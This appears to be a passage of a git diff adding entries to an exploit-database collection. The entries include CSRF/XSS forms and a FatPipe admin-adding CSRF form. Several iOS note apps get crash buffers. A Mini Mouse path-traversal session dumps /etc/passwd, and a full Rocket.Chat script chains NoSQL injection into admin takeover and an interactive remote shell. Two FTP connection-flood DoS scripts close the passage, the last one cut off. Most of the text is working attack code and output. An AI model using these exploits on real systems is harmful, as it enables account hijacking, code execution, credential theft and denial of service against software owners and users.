<input type="hidden" name="filter" value='"><script>confirm(251)</script>' />
<input type="hidden" name="x" value="0" />
<input type="hidden" name="y" value="0" />
<input type="submit" value="Go for addressbook" />
</form>
</body>
</html>
Stored XSS (POST firstname, lastname, company):
-----------------------------------------------
<html>
<body>
<form action="https://10.0.1.7/addressbook/save" method="POST">
<input type="hidden" name="firstname" value='"><script>alert(251)</script>' />
<input type="hidden" name="lastname" value='"><script>alert(251)</script>' />
<input type="hidden" name="company" value='"><script>alert(251)</script>' />
<input type="hidden" name="homephonenumber" value="1112223333" />
<input type="hidden" name="phonenumber" value="3332221111" />
<input type="hidden" name="mobilenumber" value="" />
<input type="hidden" name="faxnumber" value="" />
<input type="hidden" name="email" value="lab%40zeroscience.mk" />
<input type="hidden" name="homepage" value="" />
<input type="hidden" name="id" value="" />
<input type="hidden" name="x" value="89957" />
<input type="hidden" name="y" value="21" />
<input type="submit" value="Go for addressbook 2" />
</form>
</body>
</html>
Reflected XSS (GET lang):
-------------------------
<html>
<body>
<form action="https://10.0.1.7/statistics/versions" method="GET">
<input type="hidden" name="lang" value="en'-alert(251)-'ZSL" />
<input type="submit" value="Go for statistics" />
</form>
</body>
</html>

108
exploits/hardware/webapps/50338.txt Normal file
View file

@ -0,0 +1,108 @@
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
<!--
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 CSRF Add Admin Exploit
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
FatPipe IPVPN balances load and provides reliability among multiple
managed and CPE based VPNs as well as dedicated private networks. FatPipe
IPVPN can also provide you an easy low-cost migration path from private
line, Frame or Point-to-Point networks. You can aggregate multiple private,
MPLS and public networks without additional equipment at the provider's
site.
FatPipe MPVPN, a patented router clustering device, is an essential part
of Disaster Recovery and Business Continuity Planning for Virtual Private
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
300% times more reliable, redundant and faster. MPVPN can take WANs with
an uptime of 99.5% or less and make them 99.999988% or higher, providing
a virtually infallible WAN. MPVPN dynamically balances load over multiple
lines and ISPs without the need for BGP programming. MPVPN aggregates up
to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
you need to keep your VPN up and running despite failures of service, line,
software, or hardware.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5681
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5681.php
30.05.2016
25.07.2021
-->
<html>
<body>
<form action="https://10.0.0.7/fpui/userServlet?loadType=set&block=userSetRequest" method="POST">
<input type="hidden" name="userList" value='[{"userName":"adminz","privilege":"1","password":"TestPwd17","action":"add","state":false}]' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

35
exploits/ios/dos/49957.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)
# Date: 06-04-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/sticky-notes-color-widgets/id1476063010
# Version: 1.4.2
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

35
exploits/ios/dos/49978.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)
# Date: 06-07-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/sticky-notes-widget/id1499269608
# Version: 3.0.6
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

35
exploits/ios/dos/50001.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/secure-notepad-private-notes/id711178888
# Version: 3.0.3
# Category: DoS (iOS)
##### Vulnerability #####
Secure Notepad - Private Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

37
exploits/ios/dos/50002.py Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: Post-it 5.0.1 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/es/app/post-it/id920127738
# Version: 5.0.1
# Category: DoS (iOS)
##### Vulnerability #####
Post-it is vulnerable to a DoS condition when a long list of characters is
being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new
payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

36
exploits/ios/dos/50003.py Executable file
View file

@ -0,0 +1,36 @@
# Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217
# Version: 6.4
# Category: DoS (iOS)
##### Vulnerability #####
Notex the best notes is vulnerable to a DoS condition when a long list of
characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

35
exploits/ios/local/49977.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: memono Notepad Version 4.2 - Denial of Service (PoC)
# Date: 06-09-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/es/app/memono-bloc-de-notas/id906470619
# Version: 4.2
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")

397
exploits/ios/webapps/49747.txt Normal file
View file

@ -0,0 +1,397 @@
# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal
# Author: gosh
# Date: 05-04-2021
# Vendor Homepage: http://yodinfo.com
# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948
# Version: 9.3.0
# Tested on: iPhone; iOS 14.4.2
GET /op=get_device_info HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1
{
"ret_code": 1,
"ret_msg": "success",
"data": {
"uuid": "7E07125B-61BE-4F12-820C-FA706C445219",
"model": "iPhone",
"sys_name": "iOS",
"sys_version": "14.4.2",
"battery_state": 0,
"battery_level": -1,
"memery_total_size": 2983772160,
"device_name": "mobile",
"user_name": "iPhone",
"pwd": "",
"dir_user": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download",
"dir_doc": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents",
"dir_desktop": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop",
"sys_type": 3
}
}
-------------------------------------------------------------------------------------
POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1
{
"ret_code": 1,
"ret_msg": "success",
"data": {
"list": [{
"path": "//usr",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "usr",
"name_display": "usr",
"file_size": 288,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//bin",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "bin",
"name_display": "bin",
"file_size": 128,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//sbin",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "sbin",
"name_display": "sbin",
"file_size": 544,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//.file",
"is_local": true,
"is_hide": true,
"is_floder": false,
"name": ".file",
"name_display": ".file",
"file_size": 0,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//etc",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "etc",
"name_display": "etc",
"file_size": 11,
"create_time": 1577865.600000,
"update_time": 1577865.600000,
"sys_type": 3
}, {
"path": "//System",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "System",
"name_display": "System",
"file_size": 128,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//var",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "var",
"name_display": "var",
"file_size": 11,
"create_time": 1577865.600000,
"update_time": 1577865.600000,
"sys_type": 3
}, {
"path": "//Library",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Library",
"name_display": "Library",
"file_size": 672,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//private",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "private",
"name_display": "private",
"file_size": 224,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//dev",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "dev",
"name_display": "dev",
"file_size": 1395,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//.ba",
"is_local": true,
"is_hide": true,
"is_floder": true,
"name": ".ba",
"name_display": ".ba",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//.mb",
"is_local": true,
"is_hide": true,
"is_floder": true,
"name": ".mb",
"name_display": ".mb",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//tmp",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "tmp",
"name_display": "tmp",
"file_size": 15,
"create_time": 1577865.600000,
"update_time": 1577865.600000,
"sys_type": 3
}, {
"path": "//Applications",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Applications",
"name_display": "Applications",
"file_size": 3296,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//Developer",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Developer",
"name_display": "Developer",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//cores",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "cores",
"name_display": "cores",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}]
}
}
-------------------------
using the data found:
/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download
POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 101
{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"}
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1
{
"ret_code": 1,
"ret_msg": "success",
"data": {
"list": [{
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "GDT",
"name_display": "GDT",
"file_size": 96,
"create_time": 1617228.400302,
"update_time": 1617228.400302,
"sys_type": 3
}, {
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg",
"is_local": true,
"is_hide": false,
"is_floder": false,
"name": "input_photo.jpg",
"name_display": "input_photo.jpg",
"file_size": 6141491,
"create_time": 1617583.738397,
"update_time": 1617583.738402,
"sys_type": 3
}, {
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Ico",
"name_display": "Ico",
"file_size": 64,
"create_time": 1617583.334913,
"update_time": 1617583.334913,
"sys_type": 3
}, {
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Download",
"name_display": "Download",
"file_size": 64,
"create_time": 1617228.371587,
"update_time": 1617228.371587,
"sys_type": 3
}]
}
}
----------------------------------------------------------------------
GET /file=/etc/passwd HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 4
{}
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/octet-stream
Content-Range: bytes 0-0/2018
Content-Length : 2018
##
# User Database
#
# This file is the authoritative user database.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false
_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false
_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false
_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false
_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false
_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false
_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false
_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false
_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false
_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false
_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false

172
exploits/linux/webapps/49960.py Executable file
View file

@ -0,0 +1,172 @@
# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated)
# Author: enox
# Date: 06-06-2021
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat 3.12.1
# CVE: CVE-2021-22911
# Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat
#!/usr/bin/python
import requests
import string
import time
import hashlib
import json
import oathtool
import argparse
parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE')
parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True)
parser.add_argument('-a', help='Administrator email', required=True)
parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True)
args = parser.parse_args()
adminmail = args.a
lowprivmail = args.u
target = args.t
def forgotpassword(email,url):
payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}'
headers={'content-type': 'application/json'}
r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False)
print("[+] Password Reset Email Sent")
def resettoken(url):
u = url+"/api/v1/method.callAnon/getPasswordPolicy"
headers={'content-type': 'application/json'}
token = ""
num = list(range(0,10))
string_ints = [str(int) for int in num]
characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints
while len(token)!= 43:
for c in characters:
payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c)
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
time.sleep(0.5)
if 'Meteor.Error' not in r.text:
token += c
print(f"Got: {token}")
print(f"[+] Got token : {token}")
return token
def changingpassword(url,token):
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}'
headers={'content-type': 'application/json'}
r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
if "error" in r.text:
exit("[-] Wrong token")
print("[+] Password was changed !")
def twofactor(url,email):
# Authenticating
sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}'
headers={'content-type': 'application/json'}
r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
if "error" in r.text:
exit("[-] Couldn't authenticate")
data = json.loads(r.text)
data =(data['message'])
userid = data[32:49]
token = data[60:103]
print(f"[+] Succesfully authenticated as {email}")
# Getting 2fa code
cookies = {'rc_uid': userid,'rc_token': token}
headers={'X-User-Id': userid,'X-Auth-Token': token}
payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}'
r = requests.get(url+payload,cookies=cookies,headers=headers)
code = r.text[46:98]
print(f"Got the code for 2fa: {code}")
return code
def changingadminpassword(url,token,code):
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}'
headers={'content-type': 'application/json'}
r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
if "403" in r.text:
exit("[-] Wrong token")
print("[+] Admin password changed !")
def rce(url,code,cmd):
# Authenticating
sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
headers={'content-type': 'application/json'}
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}'
r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
if "error" in r.text:
exit("[-] Couldn't authenticate")
data = json.loads(r.text)
data =(data['message'])
userid = data[32:49]
token = data[60:103]
print("[+] Succesfully authenticated as administrator")
# Creating Integration
payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}'
cookies = {'rc_uid': userid,'rc_token': token}
headers = {'X-User-Id': userid,'X-Auth-Token': token}
r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload)
data = r.text
data = data.split(',')
token = data[12]
token = token[9:57]
_id = data[18]
_id = _id[7:24]
# Triggering RCE
u = url + '/hooks/' + _id + '/' +token
r = requests.get(u)
print(r.text)
############################################################
# Getting Low Priv user
print(f"[+] Resetting {lowprivmail} password")
## Sending Reset Mail
forgotpassword(lowprivmail,target)
## Getting reset token
token = resettoken(target)
## Changing Password
changingpassword(target,token)
# Privilege Escalation to admin
## Getting secret for 2fa
secret = twofactor(target,lowprivmail)
## Sending Reset mail
print(f"[+] Resetting {adminmail} password")
forgotpassword(adminmail,target)
## Getting reset token
token = resettoken(target)
## Resetting Password
code = oathtool.generate_otp(secret)
changingadminpassword(target,token,code)
## Authenticting and triggering rce
while True:
cmd = input("CMD:> ")
code = oathtool.generate_otp(secret)
rce(target,code,cmd)

101
exploits/multiple/dos/49697.py Executable file
View file

@ -0,0 +1,101 @@
# Exploit Title: ProFTPD 1.3.7a - Remote Denial of Service
# Date: 22/03/2021
# Exploit Author: xynmaps
# Vendor Homepage: http://www.proftpd.org/
# Software Link: https://github.com/proftpd/proftpd
# Version: 1.3.7a
# Tested on: Parrot Security OS 5.9.0
#-------------------------------#
#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#ProFTPD Denial of Service exploit by XYN/Dump/NSKB3.
"""
ProFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""
import socket
import sys
import threading
import subprocess
import time
banner = """
._________________.
| ProFTPD |
| D o S |
|_________________|
|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|
"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
def test(t,p):
s = socket.socket()
s.settimeout(10)
try:
s.connect((t, p))
response = s.recv(65535)
s.close()
return 0
except socket.error:
print("Port {} is not open, please specify a port that is open.".format(p))
sys.exit()
def attack(targ, po, id):
try:
subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#print("Worker {} running".format(id))
except OSError: pass
def main():
global target, port, start
print banner
try:
target = sys.argv[1]
except:
print usage
sys.exit()
try:
port = int(sys.argv[2])
except:
port = 21
try:
conns = int(sys.argv[3])
except:
conns = 50
print("[!] Testing if {0}:{1} is open".format(target, port))
test(target, port)
print("[+] Port {} open, starting attack...".format(port))
time.sleep(2)
print("[+] Attack started on {0}:{1}!".format(target, port))
def loop(target, port, conns):
global start
threading.Thread(target=timer).start()
while 1:
for i in range(1, conns + 3):
t = threading.Thread(target=attack, args=(target,port,i,))
t.start()
if i > conns + 2:
t.join()
break
loop()
t = threading.Thread(target=loop, args=(target, port, conns,))
t.start()
def timer():
start = time.time()
while 1:
if start < time.time() + float(900): pass
else:
subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t = threading.Thread(target=loop, args=(target, port,))
t.start()
break
main()

101
exploits/multiple/dos/49773.py Executable file
View file

@ -0,0 +1,101 @@
# Exploit Title: glFTPd 2.11a - Remote Denial of Service
# Date: 15/05/2021
# Exploit Author: xynmaps
# Vendor Homepage: https://glftpd.io/
# Software Link: https://glftpd.io/files/glftpd-LNX-2.11a_1.1.1k_x64.tgz
# Version: 2.11a
# Tested on: Parrot Security OS 5.9.0
#-------------------------------#
#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#glFTPd Denial of Service exploit by XYN/Dump/NSKB3.
"""
glFTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""
import socket
import sys
import threading
import subprocess
import time
banner = """
._________________.
| glFTPd |
| D o S |
|_________________|
|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|
"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
def test(t,p):
s = socket.socket()
s.settimeout(10)
try:
s.connect((t, p))
response = s.recv(65535)
s.close()
return 0
except socket.error:
print("Port {} is not open, please specify a port that is open.".format(p))
sys.exit()
def attack(targ, po, id):
try:
subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#print("Worker {} running".format(id))
